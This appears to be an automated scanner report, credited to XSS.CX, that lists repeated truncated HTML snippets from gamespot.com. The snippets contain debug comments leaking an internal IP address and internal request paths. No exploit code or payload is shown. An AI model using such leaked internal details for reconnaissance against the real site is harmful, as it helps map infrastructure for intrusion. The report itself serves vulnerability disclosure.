/html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=5/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=5%3A/PAGESTATE=1%7C%7C%3B%3B%3B%7 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=5/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=5%3A/PAGESTATE=1%7C%7C%3B%3B%3B%7 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=5/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=5%3A/PAGESTATE=1%7C%7C%3B%3B%3B%7 ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=39/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=39%3A/POS=100/PTYPE=6029/REMOTE_ ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=39/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=39%3A/POS=300/PTYPE=6029/REMOTE_ ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=39/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=39%3A/PAGESTATE=1%7C%7C%3B%3B%3B ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10919/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=937434/DVAR_PUBLISHER=1143/DVAR_GSESRB=E/DVAR_GSDISTRIB=Online/DVAR_GSMUL ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10919/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=937434/DVAR_PUBLISHER=1143/DVAR_GSESRB=E/DVAR_GSDISTRIB=Online/DVAR_GSMUL ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10919/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=937434/DVAR_PUBLISHER=1143/DVAR_GSESRB=E/DVAR_GSDISTRIB=Online/DVAR_GSMUL ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10919/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=10919%3A/POS=100/PTYPE=2001/R ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10919/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=10919%3A/PAGESTATE=1%7C%7C%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10919/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=10919%3A/PAGESTATE=1%7C%7C%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10919/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=10919%3A/PAGESTATE=1%7C%7C%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10919/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=10919%3A/PAGESTATE=1%7C%7C%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10919/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=10919%3A23317%3A158%3A/PAGEST ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10919/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=10919%3A23317%3A158%3A/PAGEST ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10919/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=10919%3A23317%3A158%3A/PAGEST ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10919/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=10919%3A23317%3A158%3A/PAGEST ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=4366/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=925634/DVAR_PUBLISHER=13111/DVAR_GSESRB=AO/DVAR_GSDISTRIB=Retail/DVAR_GSMU ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=4366/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=925634/DVAR_PUBLISHER=13111/DVAR_GSESRB=AO/DVAR_GSDISTRIB=Retail/DVAR_GSMU ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=4366/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=925634/DVAR_PUBLISHER=13111/DVAR_GSESRB=AO/DVAR_GSDISTRIB=Retail/DVAR_GSMU ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=996093/DVAR_PUBLISHER=2175/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMUL ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=996093/DVAR_PUBLISHER=2175/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMUL ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=996093/DVAR_PUBLISHER=2175/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMUL ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=996093/DVAR_PUBLISHER=2175/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMUL ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=960189/DVAR_PUBLISHER=1844/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMUL ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=960189/DVAR_PUBLISHER=1844/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMUL ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=960189/DVAR_PUBLISHER=1844/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMUL ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=960189/DVAR_PUBLISHER=1844/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMUL ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=960355/DVAR_PUBLISHER=13111/DVAR_GSESRB=M/DVAR_GSDISTRIB=Online/DVAR_GSMU ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=960355/DVAR_PUBLISHER=13111/DVAR_GSESRB=M/DVAR_GSDISTRIB=Online/DVAR_GSMU ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=960355/DVAR_PUBLISHER=13111/DVAR_GSESRB=M/DVAR_GSDISTRIB=Online/DVAR_GSMU ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=957922/DVAR_PUBLISHER=13111/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMU ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=957922/DVAR_PUBLISHER=13111/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMU ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=957922/DVAR_PUBLISHER=13111/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMU ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=957922/DVAR_PUBLISHER=13111/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMU ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=928235/DVAR_PUBLISHER=6374/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMUL ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=928235/DVAR_PUBLISHER=6374/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMUL ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=928235/DVAR_PUBLISHER=6374/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMUL ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=10917%3A/POS=100/PTYPE=2001/R ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=10917%3A/PAGESTATE=1%7C%7C%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=10917%3A/PAGESTATE=1%7C%7C%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=10917%3A/PAGESTATE=1%7C%7C%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=10917%3A/PAGESTATE=1%7C%7C%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=10917%3A23236%3A84%3A/PAGESTA ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=10917%3A23236%3A84%3A/PAGESTA ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=10917%3A23236%3A84%3A/PAGESTA ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10917/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=10917%3A23236%3A84%3A/PAGESTA ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=959557/DVAR_PUBLISHER=2218/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMULTIPLAY=27/DVAR_GSGENRE=48/DVAR_RAT ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=959557/DVAR_PUBLISHER=2218/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMULTIPLAY=27/DVAR_GSGENRE=48/DVAR_RAT ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=959557/DVAR_PUBLISHER=2218/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMULTIPLAY=27/DVAR_GSGENRE=48/DVAR_RAT ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=959557/DVAR_PUBLISHER=2218/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMULTIPLAY=27/DVAR_GSGENRE=48/DVAR_RAT ...[SNIP]...
Report generated by XSS.CX at Sat Jan 01 15:37:13 CST 2011.